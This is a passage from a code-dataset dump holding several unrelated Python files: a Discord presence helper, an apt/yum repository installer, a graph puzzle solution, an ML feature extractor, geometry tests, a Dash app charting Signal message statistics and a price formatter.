VALUES(1,?,\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\")''',(cID,))\n\t\tcon.commit()\n\t\tselect = (1,cID,\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\")\n\tcon.close()\n\treturn select\n\ndef existing_data():\n\tselect = storage()\n\tactivity = {\"startTimestamp\":time.time()}\n\tactivityKey = [\"clientId\",\"details\", \"state\", \"largeImageKey\", \"largeImageText\", \"smallImageKey\", \"smallImageText\"]\n\tfor i in range(7):\n\t\tactivity[activityKey[i]] = select[i+1] if not select[i+1]==\"\" else None\n\tif select[7]==\"\":\n\t\tactivity['buttons']=None\n\telse:\n\t\tactivity['buttons']=[]\n\t\tnewButton = {\"label\":select[8],\"url\":select[9]}\n\t\tactivity['buttons'].append(newButton)\n\t\tif not select[9]==\"\":\n\t\t\tnewButton = {\"label\":select[10],\"url\":select[11]}\n\t\t\tactivity['buttons'].append(newButton)\n\treturn activity\n\ndef update_specific_data(change):\n\tdata = input(f\"Enter {change} = \")\n\tsql = f'UPDATE discord SET {change}=? WHERE id=1'\n\tcon = sqlite3.connect('database.db')\n\tc = con.cursor()\n\tc.execute(sql,(data,))\n\tcon.commit()\n\tcon.close()\n\n","sub_path":"build/lib/pyrpc/funcmodule.py","file_name":"funcmodule.py","file_ext":"py","file_size_in_byte":4751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"635747163","text":"import os\nimport sys\nimport subprocess\nfrom codecs import open\n\ndef log(line):\n sys.stdout.write(line)\n sys.stdout.write(\"\\n\")\n sys.stdout.flush()\n\ndef exec_and_collects(argv, dry_run=False):\n log(\"+ {}\".format(argv))\n if dry_run:\n log(\"*** Dry run ***\")\n else:\n subprocess.check_call(argv, stderr=subprocess.STDOUT)\n\ndef write_file(filename, data, dry_run=False):\n log(\"+ [write '{}']\\n{}\".format(filename, data))\n if not dry_run:\n with open(filename, \"w\", \"utf-8\") as f:\n f.write(data)\n else:\n log(\"*** Dry run ***\\n\")\n\nclass BaseBackend:\n def __init__(self, verify_ssl=True, dry_run=False):\n self.dry_run = dry_run\n self.verify_ssl = verify_ssl\n \n def prepare(self):\n pass\n\nclass DebBackend(BaseBackend):\n DEFAULT_KEY = \"40554B8FA5FE6F6A\"\n \n def __init__(self, *args, **kwargs):\n BaseBackend.__init__(self, *args, **kwargs)\n self.apt_opts = []\n if not self.verify_ssl:\n log(\"Warning: ignoring SSL errors!\")\n self.apt_opts.extend(('-o', 'Acquire::https::Verify-Peer=false', '-o', 'Acquire::https::Verify-Host=false'))\n \n def install_packages(self, packages):\n argv = [\"apt-get\", \"install\", \"-y\"] + self.apt_opts + packages\n exec_and_collects(argv, dry_run=self.dry_run)\n \n def remove_packages(self, packages):\n argv = [\"apt-get\", \"remove\", \"-y\"] + self.apt_opts + packages\n try:\n exec_and_collects(argv, dry_run=self.dry_run)\n except subprocess.CalledProcessError as e:\n log(str(e))\n \n def add_repositories(self, protocol, server, username, token, products, dist_release, variants):\n protocol = protocol or \"https\"\n variants = \" \".join(variants)\n sources_dir = \"/etc/apt/sources.list.d\"\n log(\"+ [makedirs '{}']\".format(sources_dir))\n if not self.dry_run:\n os.makedirs(sources_dir, exist_ok=True)\n \n auth = \"{}:{}@\".format(username, token) if username and token else \"\"\n for product in products:\n filename = \"{}/tiliado-{}.list\".format(sources_dir, product)\n apt_line = \"deb {protocol}://{auth}{server}/{project}/repository/deb/ {release} {components} # {product} ({components})\\n\".format(\n product=product,\n server=server,\n protocol=protocol,\n auth=auth,\n project=product,\n release=dist_release,\n components=variants)\n write_file(filename, apt_line, dry_run=self.dry_run)\n \n def add_key(self, key):\n argv = [\"apt-key\", \"adv\", \"--keyserver\", \"hkp://keyserver.ubuntu.com:80\", \"--recv-keys\", key]\n exec_and_collects(argv, dry_run=self.dry_run)\n \n def update_db(self):\n argv = [\"apt-get\", \"update\"] + self.apt_opts\n try:\n exec_and_collects(argv, dry_run=self.dry_run)\n except subprocess.CalledProcessError as e:\n log(\"\\nWarning: Database update command failed, probably because of broken repositories in your APT sources lists. Error code:\".format(e.returncode))\n\nclass YumBackend(BaseBackend):\n DEFAULT_KEY = \"40554B8FA5FE6F6A\"\n \n def __init__(self, *args, **kwargs):\n BaseBackend.__init__(self, *args, **kwargs)\n self.yum_opts = []\n #~ if not self.verify_ssl:\n #~ log(\"Warning: ignoring SSL errors!\")\n #~ self.apt_opts.extend(('-o', 'Acquire::https::Verify-Peer=false', '-o', 'Acquire::https::Verify-Host=false'))\n \n def install_packages(self, packages):\n argv = [\"yum\", \"install\", \"-y\"] + self.yum_opts + packages\n exec_and_collects(argv, dry_run=self.dry_run)\n \n def remove_packages(self, packages):\n argv = [\"yum\", \"remove\", \"-y\"] + self.yum_opts + packages\n try:\n exec_and_collects(argv, dry_run=self.dry_run)\n except subprocess.CalledProcessError as e:\n log(str(e))\n \n def add_repositories(self, protocol, server, username, token, products, dist_release, variants):\n protocol = protocol or \"https\"\n sources_dir = \"/etc/yum.repos.d\"\n log(\"+ [makedirs '{}']\".format(sources_dir))\n if not self.dry_run:\n try:\n os.makedirs(sources_dir)\n except OSError as e:\n if e.errno != 17:\n raise e\n \n arch = os.uname()[4]\n if arch != 'x86_64':\n arch = 'i686'\n \n auth = \"{}:{}@\".format(username, token) if username and token else \"\"\n for product in products:\n buffer = []\n for component in variants:\n buffer.append('[{}-{}]'.format(product, component))\n buffer.append('name={} repository, component {} ({} {})'.format(\n product, component, dist_release, arch))\n buffer.append('baseurl={}://{}{}/{}/repository/rpm/{}/{}/{}/'.format(\n protocol, auth, server, product, dist_release, arch, component))\n buffer.append('enabled=1')\n buffer.append('gpgcheck=1')\n buffer.append('repo_gpgcheck=1')\n buffer.append('gpgkey=http://keyserver.ubuntu.com/pks/lookup?search=0x{}&op=get'.format(YumBackend.DEFAULT_KEY))\n buffer.append('enabled_metadata=1')\n buffer.append('')\n \n filename = \"{}/tiliado-{}.repo\".format(sources_dir, product)\n write_file(filename, \"\\n\".join(buffer), dry_run=self.dry_run)\n \n def add_key(self, key):\n argv = [\"rpm\", \"--import\", \"http://keyserver.ubuntu.com/pks/lookup?search=0x{}&op=get\".format(key)]\n exec_and_collects(argv, dry_run=self.dry_run)\n \n def update_db(self):\n argv = [\"yum\", \"makecache\", \"fast\", \"-y\"] + self.yum_opts\n exec_and_collects(argv, dry_run=self.dry_run)\n\ndef install(server, protocol, project, distribution, release, variants, username=None, token=None,\n install=None, dry_run=False, no_verify_ssl=False, http_proxy=None, https_proxy=None, **kwd):\n if http_proxy is not None:\n os.environ[\"http_proxy\"] = http_proxy\n if https_proxy is not None:\n os.environ[\"https_proxy\"] = https_proxy\n \n if distribution in (\"debian\", \"ubuntu\"):\n backend = DebBackend(verify_ssl = not no_verify_ssl, dry_run=dry_run)\n elif distribution in (\"fedora\",):\n backend = YumBackend(verify_ssl = not no_verify_ssl, dry_run=dry_run)\n else:\n log(\"Unsupported distribution: {}\".format(distribution))\n sys.exit(2)\n \n try:\n backend.prepare()\n \n if install:\n install = install.split(\",\")\n backend.remove_packages(install)\n \n backend.add_key(backend.DEFAULT_KEY)\n backend.add_repositories(protocol, server, username, token, project.split(\",\"), release, variants.split(\",\"))\n backend.update_db()\n \n if install:\n backend.install_packages(install)\n \n sys.exit(0)\n except subprocess.CalledProcessError as e:\n log(\"Subprocess Error: {}\".format(e))\n sys.exit(4)\n except OSError as e:\n log(\"OS Error: {}\".format(e))\n sys.exit(3)\n\ndef main():\n import argparse\n parser = argparse.ArgumentParser(description='Install repository.')\n parser.add_argument('-u', \"--username\", type=str, required=False)\n parser.add_argument('-t', \"--token\", type=str, required=False)\n parser.add_argument('-p', \"--project\", type=str, required=True)\n parser.add_argument('-d', \"--distribution\", type=str, required=True)\n parser.add_argument('-r', \"--release\", type=str, required=True)\n parser.add_argument('-v', \"--variants\", type=str, required=True)\n parser.add_argument(\"--server\", type=str, required=True)\n parser.add_argument(\"--protocol\", type=str, default=None)\n parser.add_argument(\"--http-proxy\", dest=\"http_proxy\", type=str, default=None)\n parser.add_argument(\"--https-proxy\", dest=\"https_proxy\", type=str, default=None)\n parser.add_argument(\"--dry-run\", action='store_true', default=False)\n parser.add_argument('-i', \"--install\", type=str)\n parser.add_argument('--no-verify-ssl', action=\"store_true\", default=False)\n args = parser.parse_args()\n \n install(**vars(args))\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"tiliadoweb/backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":8420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"242982781","text":"N = int(input())\n\ndef main():\n graph = []\n for i in range(1, N+1):\n for j in range(i+1, N+1):\n if i+j == N//2*2+1:\n continue\n graph.append([i, j])\n print(len(graph))\n for i, j in graph:\n print(i, j)\n\nif __name__ == \"__main__\":\n main()","sub_path":"Python_codes/p03090/s929800306.py","file_name":"s929800306.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"623504670","text":"from sklearn.base import BaseEstimator\nfrom sklearn.base import TransformerMixin\nimport numpy as np\n\nclass FeatureExtractor(BaseEstimator, TransformerMixin):\n def __init__(self):\n pass\n\n def fit(self, X_df, y):\n return self\n\n def transform(self, X_df):\n X_df_new = X_df.copy()\n for i in np.arange(5):\n X_df_new = compute_derivative(X_df_new, 'NAD', i, i+1)\n X_df_new = compute_derivative(X_df_new, 'ADL', i, i+1)\n X_df_new = compute_derivative(X_df_new, 'NA', i, i+1)\n X_df_new = compute_derivative(X_df_new, 'NCD', i, i+1)\n X_df_new = compute_ratio(X_df_new, 'NCD', 'NAD', np.arange(6))\n X_df_new = compute_ratio(X_df_new, 'CS', 'NA', np.arange(6))\n return X_df_new.drop(columns = 'site')\n\n\ndef compute_derivative(data, feature, int1, int2):\n \"\"\"\n For a given dataframe, compute the normalized difference over the\n defined period of time time (int1, int2) of a feature (feature) \n\n Parameters\n ----------\n data : dataframe\n feature : str\n feature in the dataframe we wish to compute the difference\n int1 : int\n 1rst column to take\n int2 : int\n last column to take\n \n Return\n ----------\n The same data frame with int2 - int1 - 1 colums more\n\n \"\"\"\n features = [str(feature) + '_' + str(i) for i in range(int1, int2 + 1)]\n for i in range(len(features) - 1):\n data[str(feature) + '_Diff_' + str(i)] = data[features[i+1]] - data[features[i]]\n return data\n\ndef compute_ratio(data, feature1, feature2, ints):\n \"\"\"\n For a given dataframe, compute the normalized difference over the\n defined period of time time (int1, int2) of a feature (feature) \n\n Parameters\n ----------\n data : dataframe\n feature1 : str\n feature in the dataframe which will be in the numerator\n feature2 : str\n feature in the dataframe which will be in the denominator\n ints : list of int\n for which number you want to compute the ratio\n \n Return\n ----------\n The dataframe with len(ints) more columns \n \n \"\"\"\n new_feature = str(feature1) + \"/\" + str(feature2)\n for i in ints:\n temp = data[feature2 + '_' + str(i)] + 1 #to avoid 0\n data[new_feature + '_' + str(i)] = data[feature1 + '_' + str(i)] / temp\n \n return data\n","sub_path":"submissions/random-forest-regressor/feature_extractor.py","file_name":"feature_extractor.py","file_ext":"py","file_size_in_byte":2362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"227482169","text":"import numpy as np\nimport pytest\nfrom bbox import BBox3D\nfrom bbox.geometry import plane, point_plane_dist, polygon_area, polygon_intersection, polygon_collision, edges_of, orthogonal, is_separating_axis\n\n\ndef clip(subjectPolygon, clipPolygon):\n \"\"\"\n Naive implementation picked up from Rosetta Code. \n Only used for testing purposes.\n \"\"\"\n def inside(p):\n return(cp2[0]-cp1[0])*(p[1]-cp1[1]) > (cp2[1]-cp1[1])*(p[0]-cp1[0])\n\n def computeIntersection():\n dc = [cp1[0] - cp2[0], cp1[1] - cp2[1]]\n dp = [s[0] - e[0], s[1] - e[1]]\n n1 = cp1[0] * cp2[1] - cp1[1] * cp2[0]\n n2 = s[0] * e[1] - s[1] * e[0]\n n3 = 1.0 / (dc[0] * dp[1] - dc[1] * dp[0])\n return [(n1*dp[0] - n2*dc[0]) * n3, (n1*dp[1] - n2*dc[1]) * n3]\n\n outputList = subjectPolygon\n cp1 = clipPolygon[-1]\n\n for clipVertex in clipPolygon:\n cp2 = clipVertex\n inputList = outputList\n outputList = []\n s = inputList[-1]\n\n for subjectVertex in inputList:\n e = subjectVertex\n if inside(e):\n if not inside(s):\n outputList.append(computeIntersection())\n outputList.append(e)\n elif inside(s):\n outputList.append(computeIntersection())\n s = e\n cp1 = cp2\n return(outputList)\n\n\ndef test_plane():\n # define the 3 points\n a = np.array([1, 1, 1])\n b = np.array([-1, 1, 0])\n c = np.array([2, 0, 3])\n assert np.array_equal(plane(a, b, c), np.array([-1, 3, 2, -4]))\n\n\ndef test_point_plane_dist():\n pt = np.array([2, 8, 5])\n plane = np.array([1, -2, -2, -1])\n assert point_plane_dist(pt, plane) == 25/3\n assert point_plane_dist(pt, plane, signed=True) == -25/3\n\n\ndef test_polygon_area():\n polygon = np.array([[-3, -2], [-1, 4], [6, 1], [3, 10], [-4, 9]])\n assert polygon_area(polygon) == 60\n\n\ndef test_polygon_intersection():\n a = BBox3D(0.5, 0.5, 0.5, 1, 1, 1)\n b = BBox3D(1, 1, 1, 1, 1, 1)\n\n i1 = clip(a.p[0: 4, 0: 2], b.p[0: 4, 0: 2])\n i1 = np.array(i1)\n i2 = polygon_intersection(a.p[0: 4, 0: 2], b.p[0: 4, 0: 2])\n assert np.array_equal(i1, i2)\n\n\n# Ensure 100% test coverage\ndef test_is_separating_axis():\n # randomly generated values\n a = BBox3D(0.9, 0.5, 0.5, 1, 1, 1)\n b = BBox3D(0.1, 0.1, 0.1, 0.1, 1, 1)\n\n p1, p2 = a.p[0:4, 0:2], b.p[0:4, 0:2]\n edges = edges_of(p1)\n edges += edges_of(p2)\n \n # positive case\n separates, pv = is_separating_axis(orthogonal(edges[0]), p1, p2)\n assert separates == False and pv is not None\n\n separates, pv = is_separating_axis(orthogonal(edges[1]), p1, p2)\n assert separates == True and pv is None\n\n\ndef test_polygon_no_collision():\n # randomly generated values\n a = BBox3D(0.9, 0.5, 0.5, 1, 1, 1)\n b = BBox3D(0.1, 0.1, 0.1, 0.1, 1, 1)\n p1, p2 = a.p[0:4, 0:2], b.p[0:4, 0:2]\n\n assert polygon_collision(p1, p2) == False","sub_path":"tests/test_geometry.py","file_name":"test_geometry.py","file_ext":"py","file_size_in_byte":2926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"288369382","text":"\"\"\"Analysis of the data\"\"\"\n\nimport itertools\nimport logging\nimport pickle\nimport re\nimport time\nfrom datetime import timedelta\n\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport emoji\nimport numpy as np\nimport pandas as pd\nimport plotly.graph_objs as go\nfrom dash.dependencies import Input, Output\n\nimport db\nimport utilities\n\nLOGGER = logging.getLogger(__name__)\n\nEMOJI_SET = set(emoji.UNICODE_EMOJI)\n\nLOGGER.debug(\"Unpickling configuration\")\nCONFIG = pickle.load(open(\".config.pkl\", \"rb\"))\nLAST_UPDATE = time.time()\nMESSAGES = db.fetch_messages(CONFIG, as_dataframe=True)\nCONVS = utilities.conversation_mapping(CONFIG)\n\nAPP = dash.Dash(\"signal-statistics\")\n# APP.config[\"suppress_callback_exceptions\"] = True\nAPP.layout = html.Div(\n [\n # Header\n html.Div(\n [\n html.Span(\"Signal Conversation Statistics\", className=\"title\"),\n html.Div(\n [\n dcc.Dropdown(\n id=\"conversation\",\n options=sorted(\n [\n {\"label\": v, \"value\": k.decode(\"UTF-8\")}\n for k, v in CONVS.items()\n ],\n key=lambda o: o[\"label\"],\n ),\n )\n ],\n className=\"conversation-selector\",\n ),\n ],\n className=\"header\",\n ),\n # Content\n html.Div(\n [\n # Timeline\n html.Div(\n [\n html.H2(\"Conversation Timeline\"),\n dcc.Tabs(\n [\n dcc.Tab(label=\"Messages\", value=\"messages\"),\n dcc.Tab(label=\"Words\", value=\"words\"),\n dcc.Tab(label=\"Characters\", value=\"characters\"),\n ],\n id=\"timeline-value\",\n value=\"messages\",\n ),\n dcc.Loading(dcc.Graph(id=\"timeline-figure\")),\n ],\n className=\"timeline\",\n ),\n # Histogram\n html.Div(\n [\n html.H2(\"Histogram\"),\n html.Div(\n [\n dcc.Dropdown(\n id=\"histogram-reduction\",\n options=[\n {\n \"label\": \"Day of Week\",\n \"value\": \"day_of_week\",\n },\n {\n \"label\": \"Time of Day\",\n \"value\": \"time_of_day\",\n },\n ],\n value=\"time_of_day\",\n clearable=False,\n ),\n dcc.Dropdown(\n id=\"histogram-value\",\n options=[\n {\"label\": \"Messages\", \"value\": \"messages\"},\n {\"label\": \"Words\", \"value\": \"words\"},\n {\"label\": \"Characters\", \"value\": \"characters\"},\n ],\n value=\"messages\",\n clearable=False,\n ),\n ]\n ),\n dcc.Loading(dcc.Graph(id=\"histogram-figure\")),\n ],\n className=\"histogram\",\n ),\n # Emoji\n html.Div(\n [\n html.H2(\"Emoji Use\"),\n dcc.Loading(dcc.Graph(id=\"emoji-figure\")),\n dcc.Slider(\n id=\"emoji-threshold\",\n min=0,\n max=100,\n step=5,\n value=10,\n dots=True,\n marks={v: f\"{v}\" for v in range(0, 100 + 1, 10)},\n ),\n ],\n className=\"emoji\",\n ),\n # n-grams\n html.Div(\n [\n html.H2(\"N-grams\"),\n dcc.Slider(\n id=\"ngrams-words\",\n min=1,\n max=10,\n step=1,\n value=2,\n dots=True,\n marks={v: f\"{v}\" for v in range(1, 11, 1)},\n ),\n dcc.Loading(dcc.Graph(id=\"ngrams-figure\")),\n dcc.Slider(\n id=\"ngrams-threshold\",\n min=0,\n max=100,\n step=5,\n value=10,\n dots=True,\n marks={v: f\"{v}\" for v in range(0, 100 + 1, 10)},\n ),\n ],\n className=\"ngrams\",\n ),\n # Conversation starter\n html.Div(\n [\n html.H2(\"Conversation starter\"),\n dcc.Loading(dcc.Graph(id=\"conversation-starter-figure\")),\n dcc.Slider(\n id=\"conversation-starter-threshold\",\n min=0,\n max=6,\n step=0.5,\n value=2,\n dots=True,\n marks={v: f\"{v}h\" for v in range(0, 6 + 1, 1)},\n ),\n ],\n className=\"conversation-starter\",\n ),\n ],\n className=\"content\",\n ),\n ]\n)\n\n\ndef load_messages():\n \"\"\"Load the messages, possibly updating the global variable if needed.\"\"\"\n global LAST_UPDATE\n global MESSAGES\n\n if MESSAGES is None or time.time() - LAST_UPDATE > 60:\n LOGGER.info(\"Updating messages...\")\n LAST_UPDATE = time.time()\n MESSAGES = db.fetch_messages(CONFIG, as_dataframe=True)\n else:\n LOGGER.debug(\"Using pre-fetched messages.\")\n\n return MESSAGES.copy()\n\n\ndef select_conversation(messages, conversation):\n \"\"\"Select those messages which belong to the selected conversation.\"\"\"\n if conversation:\n messages = messages[messages[\"conversation_id\"] == conversation.encode(\"UTF-8\")]\n\n return messages\n\n\ndef split_messages(messages, conversation):\n \"\"\"Select those messages which belong to the selected conversation and split\n them into incoming and outgoing messages.\"\"\"\n messages = select_conversation(messages, conversation)\n\n return (messages.query(\"type == 'incoming'\"), messages.query(\"type == 'outgoing'\"))\n\n\ndef filter_timeline(messages, timeline_data):\n \"\"\"Filter messages selecting only those messages in the timeline's range.\"\"\"\n if timeline_data is None:\n return messages\n\n if \"xaxis.range\" in timeline_data:\n start, end = timeline_data[\"xaxis.range\"]\n elif \"xaxis.range[0]\" in timeline_data:\n start = timeline_data[\"xaxis.range[0]\"]\n end = timeline_data[\"xaxis.range[1]\"]\n else:\n return messages\n\n start = pd.to_datetime(start)\n end = pd.to_datetime(end)\n messages = messages[(start < messages[\"sent_at\"]) & (messages[\"sent_at\"] < end)]\n return messages\n\n\n@APP.callback(\n Output(\"timeline-figure\", \"figure\"),\n [Input(\"timeline-value\", \"value\"), Input(\"conversation\", \"value\")],\n)\ndef timeline(value, conversation):\n \"\"\"Create a timeline of the timeline showing how much activity there was on\n each day.\"\"\"\n\n messages = load_messages()\n messages[\"messages\"] = messages[\"body\"].apply(lambda x: 1 if x else 0)\n messages[\"words\"] = messages[\"body\"].apply(lambda x: len(x.split()) if x else 0)\n messages[\"characters\"] = messages[\"body\"].apply(lambda x: len(x) if x else 0)\n\n incoming, outgoing = split_messages(messages, conversation)\n\n hist_options = {\"xbins\": {\"size\": \"1D\"}, \"histfunc\": \"sum\", \"opacity\": 0.5}\n layout = {\n \"xaxis\": {\n \"name\": \"Date\",\n \"type\": \"date\",\n \"rangeselector\": {\n \"buttons\": [\n {\n \"label\": \"1m\",\n \"count\": 1,\n \"step\": \"month\",\n \"stepmode\": \"backward\",\n },\n {\n \"label\": \"6m\",\n \"count\": 6,\n \"step\": \"month\",\n \"stepmode\": \"backward\",\n },\n {\"step\": \"all\"},\n ]\n },\n \"rangeslider\": {\"visible\": True},\n },\n \"barmode\": \"overlay\",\n }\n\n data = [\n go.Histogram(\n x=incoming[\"sent_at\"], y=incoming[value], name=\"Received\", **hist_options\n ),\n go.Histogram(\n x=outgoing[\"sent_at\"], y=outgoing[value], name=\"Sent\", **hist_options\n ),\n ]\n\n if incoming.size < outgoing.size:\n data.reverse()\n\n return dict(data=data, layout=layout)\n\n\n@APP.callback(\n Output(\"histogram-figure\", \"figure\"),\n [\n Input(\"histogram-value\", \"value\"),\n Input(\"histogram-reduction\", \"value\"),\n Input(\"conversation\", \"value\"),\n Input(\"timeline-figure\", \"relayoutData\"),\n ],\n)\ndef histogram(value, reduction, conversation, timeline_data):\n \"\"\"Create a histogram of the conversation, reducing the data as per the\n reduction.\"\"\"\n\n messages = load_messages()\n messages = filter_timeline(messages, timeline_data)\n\n messages[\"messages\"] = messages[\"body\"].apply(lambda x: 1 if x else 0)\n messages[\"words\"] = messages[\"body\"].apply(lambda x: len(x.split()) if x else 0)\n messages[\"characters\"] = messages[\"body\"].apply(lambda x: len(x) if x else 0)\n messages[\"time_of_day\"] = messages[\"sent_at\"].apply(\n lambda t: t.hour + t.minute / 60 + t.second / 60 / 60\n )\n messages[\"day_of_week\"] = messages[\"sent_at\"].apply(lambda t: t.weekday())\n messages.sort_values(by=reduction, inplace=True)\n\n incoming, outgoing = split_messages(messages, conversation)\n\n hist_options = {\"opacity\": 0.5}\n layout = {\"bargap\": 0.2, \"bargroupgap\": 0.0}\n\n if reduction == \"day_of_week\":\n print(messages[value].unique())\n hist_options[\"nbinsx\"] = 7\n # hist_options[\"xbins\"] = {\"size\": 1}\n layout[\"xaxis\"] = {\n \"type\": \"category\",\n \"tickmode\": \"array\",\n \"tickvals\": [0, 1, 2, 3, 4, 5, 6],\n \"ticktext\": [\n \"Monday\",\n \"Tuesday\",\n \"Wednesday\",\n \"Thursday\",\n \"Friday\",\n \"Saturday\",\n \"Sunday\",\n ],\n }\n elif reduction == \"time_of_day\":\n hist_options[\"nbinsx\"] = 24\n # hist_options[\"xbins\"] = {\"size\": 1}\n layout[\"xaxis\"] = {\"tick0\": 0, \"dtick\": 1}\n\n data = [\n go.Histogram(\n x=incoming[reduction], y=incoming[value], name=\"Received\", **hist_options\n ),\n go.Histogram(\n x=outgoing[reduction], y=outgoing[value], name=\"Sent\", **hist_options\n ),\n ]\n\n if incoming.size < outgoing.size:\n data.reverse()\n\n return dict(data=data, layout=layout)\n\n\n@APP.callback(\n Output(\"emoji-figure\", \"figure\"),\n [\n Input(\"emoji-threshold\", \"value\"),\n Input(\"conversation\", \"value\"),\n Input(\"timeline-figure\", \"relayoutData\"),\n ],\n)\ndef emoji_use(threshold, conversation, timeline_data):\n \"\"\"Create a histogram of the conversation, reducing the data as per the\n reduction.\"\"\"\n\n messages = load_messages()\n messages = filter_timeline(messages, timeline_data)\n\n messages[\"emoji\"] = (\n messages[\"body\"]\n .apply(lambda txt: txt if txt else \"\")\n .apply(lambda txt: [l for l in txt if l in EMOJI_SET])\n )\n\n incoming, outgoing = split_messages(messages, conversation)\n values, counts = np.unique(incoming[\"emoji\"].sum(), return_counts=True)\n in_emojis = pd.Series(index=values, data=counts)\n values, counts = np.unique(outgoing[\"emoji\"].sum(), return_counts=True)\n out_emojis = pd.Series(index=values, data=counts)\n\n data = pd.concat(\n {\"incoming\": in_emojis, \"outgoing\": out_emojis}, axis=1, sort=False\n ).fillna(0)\n data[\"total\"] = data[\"incoming\"] + data[\"outgoing\"]\n data.sort_values(by=\"total\", inplace=True, ascending=False)\n data = data.query(f\"total >= {threshold}\")\n\n hist_options = {\"opacity\": 0.5}\n layout = {\"bargap\": 0.2, \"bargroupgap\": 0.0}\n\n data = [\n go.Bar(x=data.index, y=data[\"incoming\"], name=\"Received\", **hist_options),\n go.Bar(x=data.index, y=data[\"outgoing\"], name=\"Sent\", **hist_options),\n ]\n\n if incoming.size < outgoing.size:\n data.reverse()\n\n return dict(data=data, layout=layout)\n\n\n@APP.callback(\n Output(\"ngrams-figure\", \"figure\"),\n [\n Input(\"ngrams-words\", \"value\"),\n Input(\"ngrams-threshold\", \"value\"),\n Input(\"conversation\", \"value\"),\n Input(\"timeline-figure\", \"relayoutData\"),\n ],\n)\ndef ngrams(n, threshold, conversation, timeline_data):\n \"\"\"Create a histogram of the conversation, reducing the data as per the\n reduction.\"\"\"\n\n messages = load_messages()\n messages = filter_timeline(messages, timeline_data)\n\n punct = re.compile(\"[.,;:!?]\")\n\n messages[\"ngrams\"] = (\n messages[\"body\"]\n # Lowercase everything\n .apply(lambda x: x.lower() if x else \"\")\n # Replace ’ with '\n .apply(lambda x: x.replace(\"’\", \"'\"))\n # split at punctuation (ngrams don't cross a full stop)\n .apply(punct.split)\n # split each segment now based on whitespace\n .apply(lambda x: [s.split() for s in x])\n # take all n-contiguous subsets of each split segment, and join them\n # with a whitespace\n .apply(\n lambda x: [\n [\" \".join(s[i : i + n]) for i in range(len(s) - n + 1)] for s in x\n ]\n )\n # flatten the array\n .apply(lambda x: list(itertools.chain(*x)))\n )\n\n incoming, outgoing = split_messages(messages, conversation)\n values, counts = np.unique(incoming[\"ngrams\"].sum(), return_counts=True)\n in_grams = pd.Series(index=values, data=counts)\n values, counts = np.unique(outgoing[\"ngrams\"].sum(), return_counts=True)\n out_grams = pd.Series(index=values, data=counts)\n\n data = pd.concat(\n {\"incoming\": in_grams, \"outgoing\": out_grams}, axis=1, sort=False\n ).fillna(0)\n data[\"total\"] = data[\"incoming\"] + data[\"outgoing\"]\n data.sort_values(by=\"total\", inplace=True, ascending=False)\n data = data.query(f\"total >= {threshold}\")\n\n hist_options = {\"opacity\": 0.5}\n layout = {\"bargap\": 0.2, \"bargroupgap\": 0.0}\n\n data = [\n go.Bar(x=data.index, y=data[\"incoming\"], name=\"Received\", **hist_options),\n go.Bar(x=data.index, y=data[\"outgoing\"], name=\"Sent\", **hist_options),\n ]\n\n if incoming.size < outgoing.size:\n data.reverse()\n\n return dict(data=data, layout=layout)\n\n\n@APP.callback(\n Output(\"conversation-starter-figure\", \"figure\"),\n [\n Input(\"conversation-starter-threshold\", \"value\"),\n Input(\"conversation\", \"value\"),\n Input(\"timeline-figure\", \"relayoutData\"),\n ],\n)\ndef conversation_starter(threshold, conversation, timeline_data):\n \"\"\"Create a pie chart of who initiates conversations\"\"\"\n if conversation:\n conversation_label = CONVS[conversation.encode(\"UTF-8\")]\n else:\n conversation_label = \"Others\"\n\n messages = load_messages()\n messages = filter_timeline(messages, timeline_data)\n messages = select_conversation(messages, conversation)\n\n threshold = timedelta(seconds=threshold * 3600)\n conversations = [\n {\n \"starter\": messages.iloc[0][\"type\"],\n \"start\": messages.iloc[0][\"sent_at\"],\n \"last\": messages.iloc[0][\"sent_at\"],\n }\n ]\n for _, msg in messages.iterrows():\n if msg[\"sent_at\"] - conversations[-1][\"last\"] < threshold:\n conversations[-1][\"last\"] = msg[\"sent_at\"]\n else:\n conversations.append(\n {\n \"starter\": msg[\"type\"],\n \"start\": msg[\"sent_at\"],\n \"last\": msg[\"sent_at\"],\n }\n )\n conversations = pd.DataFrame(conversations)\n conversations[\"length\"] = conversations[\"last\"] - conversations[\"start\"]\n\n data = conversations[\"starter\"].value_counts().to_frame()\n data.index = data.index.map({\"outgoing\": \"Me\", \"incoming\": conversation_label})\n data[\"msg_count\"] = 0\n for idx in data.index:\n data.loc[idx, \"msg_count\"] = len(messages.query(f\"type == '{idx}'\").index)\n data.sort_values(by=\"msg_count\", inplace=True)\n\n layout = {}\n\n data = [go.Pie(labels=data.index, values=data[\"starter\"])]\n\n return dict(data=data, layout=layout)\n\n\ndef main(debug):\n \"\"\"Start the plot.ly server\"\"\"\n LOGGER.info(\"Starting plot.ly server\")\n\n APP.run_server(debug=debug)\n","sub_path":"stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":17976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"352484122","text":"import argparse\n\n\ndef get_formatted_price(price_string):\n price = float(price_string.replace(',', '.'))\n if price.is_integer():\n price_formatted = \"{:,.0f}\".format(price)\n else:\n price_formatted = \"{:,.2f}\".format(price)\n return price_formatted.replace(',', ' ')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=\"Price formatter\")\n parser.add_argument(\"price_string\", help=\"the price you want to format\")\n args = parser.parse_args()\n try:\n pretty_price = get_formatted_price(args.price_string)\n except ValueError as error:\n print(\"Something went wrong!\", error)\n exit(\"Exiting...\")\n print(pretty_price)\n \n","sub_path":"format_price.py","file_name":"format_price.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"533734962","text":"import os\n\ndef main():\n counter = 0\n rootDir = 